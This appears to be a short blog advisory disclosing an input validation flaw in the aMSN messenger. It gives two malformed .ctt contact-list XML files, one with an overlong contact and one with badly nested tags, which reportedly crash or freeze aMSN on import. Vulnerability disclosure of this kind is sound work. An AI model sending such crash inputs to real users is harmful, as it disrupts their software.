aMSN Input Validation Error

Risk: Low
Tipology: Input Validation Error

All aMSN versions, both on Windows and Linux platorms.

As Microsoft MSN, aMSN have a nice feature for Exporting and Importing the list of
contacts you have.

This list is dumped into an XML file (file extension .ctt), with this structure

——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact> your_contact@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
——————————————————————–

aMSN does not Validate correctly the Contacts you insert, precisely does not parse
the format of this file, and suddenly when you import a malformed Contact List it
shutdown

here an example of malformed input list

——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
——————————————————————-

Or another possibility

——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact><contact><contact><contact><contact></contact></contact><contact></contact></contact></contact></contact>
</contact>
</contactlist>
</service>
</messenger>
——————————————————————-

This will cause a freeze of aMSN..

If you use the same “trick” with Ms Messenger, a MessageBox will advice you of the malformed
file😉

See you to the next post

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: